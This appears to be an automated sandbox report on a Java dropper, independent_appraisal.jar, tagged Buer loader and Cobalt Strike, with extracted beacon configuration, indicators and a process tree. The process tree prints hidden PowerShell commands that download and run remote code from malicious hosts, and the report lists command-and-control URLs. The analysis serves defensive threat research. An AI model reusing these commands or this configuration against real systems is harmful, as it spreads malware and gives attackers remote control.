buer | 25840b76b6cf2762898086cd4b62e556bedb9ffcff1a565bad872662c2e5bb36

Resubmissions

12-02-2021 17:46

210212-qj1pxv26za 10

12-02-2021 13:49

210212-qh2m1q4eyx 10

Analysis

max time kernel
1799s
max time network
1799s
platform
windows10_x64
resource
win10v20201028
submitted
12-02-2021 13:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

independent_appraisal.jar
Size

6KB
MD5

e94dbabc70b4396b39d3a3d3e53cf85b
SHA1

bc6f6267313c0a768ed3f8f92f90c1f105cbd949
SHA256

25840b76b6cf2762898086cd4b62e556bedb9ffcff1a565bad872662c2e5bb36
SHA512

fb2eb9aeb02d111c23cdb61f668affcfb3e847159ce8a158ed39e2f136b9993f8dc68ddbd649d8f13f75ced7f7499c6410861daa1fde8fb15c010c6ccd2f3582

Score

10^/10

buer cobaltstrike backdoor loader trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr

Extracted

Family

buer

antipublicwestbank.com

Extracted

Family

cobaltstrike

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://luasdyfaenflkjasdfh.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
0
maxdns
255
month
0
pipe_name
polling_time
5000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.018915346e+09
uri
/N4215/adj/amzn.us.sr.aps
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Extracted

Family

cobaltstrike

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
0
maxdns
255
month
0
pipe_name
polling_time
5000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.018915346e+09
uri
/N4215/adj/amzn.us.sr.aps
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Buer
Buer is a new modular loader first seen in August 2019.
loader buer
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3928 created 2472	3928	WerFault.exe	81

Buer Loader 1 IoCs

Detects Buer loader in memory or disk.

resource	yara_rule
behavioral1/memory/2472-9-0x0000000040000000-0x000000004000A000-memory.dmp	buer

Blocklisted process makes network request 64 IoCs

flow	pid	Process
26	2264	powershell.exe
27	2264	powershell.exe
28	2264	powershell.exe
29	2264	powershell.exe
30	2264	powershell.exe
31	2264	powershell.exe
32	2264	powershell.exe
33	2264	powershell.exe
34	2264	powershell.exe
35	2264	powershell.exe
36	2264	powershell.exe
37	2264	powershell.exe
38	2264	powershell.exe
39	2264	powershell.exe
40	2264	powershell.exe
41	2264	powershell.exe
42	2264	powershell.exe
43	2264	powershell.exe
44	2264	powershell.exe
45	2264	powershell.exe
46	2264	powershell.exe
48	2224	powershell.exe
49	2224	powershell.exe
50	2264	powershell.exe
51	2224	powershell.exe
52	2264	powershell.exe
53	2224	powershell.exe
54	2264	powershell.exe
55	2224	powershell.exe
56	2264	powershell.exe
57	2224	powershell.exe
58	2264	powershell.exe
59	2224	powershell.exe
60	2264	powershell.exe
61	2224	powershell.exe
62	2264	powershell.exe
63	2224	powershell.exe
64	2264	powershell.exe
65	2224	powershell.exe
66	2264	powershell.exe
67	2224	powershell.exe
68	2264	powershell.exe
69	2224	powershell.exe
70	2264	powershell.exe
71	2224	powershell.exe
72	2264	powershell.exe
73	2224	powershell.exe
74	2264	powershell.exe
75	2224	powershell.exe
76	2264	powershell.exe
77	2224	powershell.exe
78	2264	powershell.exe
79	2224	powershell.exe
80	2264	powershell.exe
81	2264	powershell.exe
82	2224	powershell.exe
83	2264	powershell.exe
84	2224	powershell.exe
85	2264	powershell.exe
86	2224	powershell.exe
87	2264	powershell.exe
88	2224	powershell.exe
89	2264	powershell.exe
90	2224	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3936	vdeodrv32.exe
2472	vdeodrv32.exe

Loads dropped DLL 1 IoCs

pid	Process
3936	vdeodrv32.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	vdeodrv32.exe
File opened (read-only)	\??\L:	vdeodrv32.exe
File opened (read-only)	\??\O:	vdeodrv32.exe
File opened (read-only)	\??\U:	vdeodrv32.exe
File opened (read-only)	\??\X:	vdeodrv32.exe
File opened (read-only)	\??\Z:	vdeodrv32.exe
File opened (read-only)	\??\E:	vdeodrv32.exe
File opened (read-only)	\??\G:	vdeodrv32.exe
File opened (read-only)	\??\I:	vdeodrv32.exe
File opened (read-only)	\??\W:	vdeodrv32.exe
File opened (read-only)	\??\Q:	vdeodrv32.exe
File opened (read-only)	\??\R:	vdeodrv32.exe
File opened (read-only)	\??\S:	vdeodrv32.exe
File opened (read-only)	\??\T:	vdeodrv32.exe
File opened (read-only)	\??\A:	vdeodrv32.exe
File opened (read-only)	\??\H:	vdeodrv32.exe
File opened (read-only)	\??\N:	vdeodrv32.exe
File opened (read-only)	\??\P:	vdeodrv32.exe
File opened (read-only)	\??\V:	vdeodrv32.exe
File opened (read-only)	\??\M:	vdeodrv32.exe
File opened (read-only)	\??\B:	vdeodrv32.exe
File opened (read-only)	\??\F:	vdeodrv32.exe
File opened (read-only)	\??\J:	vdeodrv32.exe
File opened (read-only)	\??\K:	vdeodrv32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3936 set thread context of 2472	3936	vdeodrv32.exe	81

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3928	2472	WerFault.exe	81

NSIS installer 6 IoCs

installer

resource	yara_rule
behavioral1/files/0x000800000000068d-4.dat	nsis_installer_1
behavioral1/files/0x000800000000068d-4.dat	nsis_installer_2
behavioral1/files/0x000800000000068d-5.dat	nsis_installer_1
behavioral1/files/0x000800000000068d-5.dat	nsis_installer_2
behavioral1/files/0x000800000000068d-8.dat	nsis_installer_1
behavioral1/files/0x000800000000068d-8.dat	nsis_installer_2

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
2264	powershell.exe
2264	powershell.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
2264	powershell.exe
2264	powershell.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3936	vdeodrv32.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeRestorePrivilege	3928	WerFault.exe
Token: SeBackupPrivilege	3928	WerFault.exe
Token: SeDebugPrivilege	3928	WerFault.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3976	java.exe
3976	java.exe
3976	java.exe
3976	java.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 3936	3976	java.exe	80
PID 3976 wrote to memory of 3936	3976	java.exe	80
PID 3976 wrote to memory of 3936	3976	java.exe	80
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	81
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	81
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	81
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	81
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	82
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	82
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	82
PID 4000 wrote to memory of 2264	4000	cmd.exe	84
PID 4000 wrote to memory of 2264	4000	cmd.exe	84
PID 4000 wrote to memory of 2264	4000	cmd.exe	84
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	85
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	85
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	85
PID 484 wrote to memory of 2224	484	cmd.exe	87
PID 484 wrote to memory of 2224	484	cmd.exe	87
PID 484 wrote to memory of 2224	484	cmd.exe	87
PID 2264 wrote to memory of 2656	2264	powershell.exe	15
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	88
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	88
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	88
PID 3716 wrote to memory of 1228	3716	cmd.exe	90
PID 3716 wrote to memory of 1228	3716	cmd.exe	90
PID 3716 wrote to memory of 1228	3716	cmd.exe	90
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	91
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	91
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	91
PID 964 wrote to memory of 1156	964	cmd.exe	93
PID 964 wrote to memory of 1156	964	cmd.exe	93
PID 964 wrote to memory of 1156	964	cmd.exe	93
PID 2264 wrote to memory of 2348	2264	powershell.exe	36

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2656

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\independent_appraisal.jar
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3976
- C:\ProgramData\vdeodrv32.exe
  "C:\ProgramData\vdeodrv32.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\ProgramData\vdeodrv32.exe
    "C:\ProgramData\vdeodrv32.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2264
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:484
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s'))"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr'))"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1228
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 20824
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2348

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1156-78-0x0000000004CA2000-0x0000000004CA3000-memory.dmp

Filesize
4KB

Download
memory/1156-74-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/1156-76-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/1156-88-0x0000000004CA3000-0x0000000004CA4000-memory.dmp

Filesize
4KB

Download
memory/1156-90-0x0000000009A40000-0x0000000009A7D000-memory.dmp

Filesize
244KB

Download
memory/1228-71-0x0000000008E10000-0x0000000008E4D000-memory.dmp

Filesize
244KB

Download
memory/1228-70-0x0000000006710000-0x0000000006743000-memory.dmp

Filesize
204KB

Download
memory/1228-69-0x0000000000BD3000-0x0000000000BD4000-memory.dmp

Filesize
4KB

Download
memory/1228-65-0x0000000000BD2000-0x0000000000BD3000-memory.dmp

Filesize
4KB

Download
memory/1228-63-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/1228-55-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/2224-31-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/2224-48-0x0000000008DE0000-0x0000000008E1D000-memory.dmp

Filesize
244KB

Download
memory/2224-47-0x0000000006730000-0x0000000006763000-memory.dmp

Filesize
204KB

Download
memory/2224-46-0x00000000041F3000-0x00000000041F4000-memory.dmp

Filesize
4KB

Download
memory/2224-40-0x00000000041F2000-0x00000000041F3000-memory.dmp

Filesize
4KB

Download
memory/2224-38-0x00000000041F0000-0x00000000041F1000-memory.dmp

Filesize
4KB

Download
memory/2264-13-0x0000000006EF0000-0x0000000006EF1000-memory.dmp

Filesize
4KB

Download
memory/2264-19-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/2264-22-0x0000000006EF2000-0x0000000006EF3000-memory.dmp

Filesize
4KB

Download
memory/2264-28-0x0000000009660000-0x000000000969D000-memory.dmp

Filesize
244KB

Download
memory/2264-27-0x0000000006F60000-0x0000000006F93000-memory.dmp

Filesize
204KB

Download
memory/2264-21-0x0000000008160000-0x0000000008161000-memory.dmp

Filesize
4KB

Download
memory/2264-26-0x0000000006EF3000-0x0000000006EF4000-memory.dmp

Filesize
4KB

Download
memory/2264-25-0x00000000090F0000-0x00000000090F1000-memory.dmp

Filesize
4KB

Download
memory/2264-24-0x0000000009960000-0x0000000009961000-memory.dmp

Filesize
4KB

Download
memory/2264-94-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

Filesize
4KB

Download
memory/2264-51-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/2264-50-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/2264-12-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/2264-20-0x0000000007FD0000-0x0000000007FD1000-memory.dmp

Filesize
4KB

Download
memory/2264-23-0x0000000008440000-0x0000000008441000-memory.dmp

Filesize
4KB

Download
memory/2264-18-0x00000000073E0000-0x00000000073E1000-memory.dmp

Filesize
4KB

Download
memory/2264-17-0x00000000074C0000-0x00000000074C1000-memory.dmp

Filesize
4KB

Download
memory/2264-16-0x0000000007340000-0x0000000007341000-memory.dmp

Filesize
4KB

Download
memory/2264-15-0x0000000007530000-0x0000000007531000-memory.dmp

Filesize
4KB

Download
memory/2264-14-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/2348-92-0x0000000000E00000-0x0000000000E40000-memory.dmp

Filesize
256KB

Download
memory/2348-95-0x000002324E020000-0x000002324E06C000-memory.dmp

Filesize
304KB

Download
memory/2472-9-0x0000000040000000-0x000000004000A000-memory.dmp

Filesize
40KB

Download
memory/2656-52-0x000001FC25660000-0x000001FC256AC000-memory.dmp

Filesize
304KB

Download
memory/2656-49-0x0000000000D70000-0x0000000000DB0000-memory.dmp

Filesize
256KB

Download
memory/3928-91-0x00000000042E0000-0x00000000042E1000-memory.dmp

Filesize
4KB

Download
memory/3976-2-0x0000000002540000-0x00000000027B0000-memory.dmp

Filesize
2.4MB

Download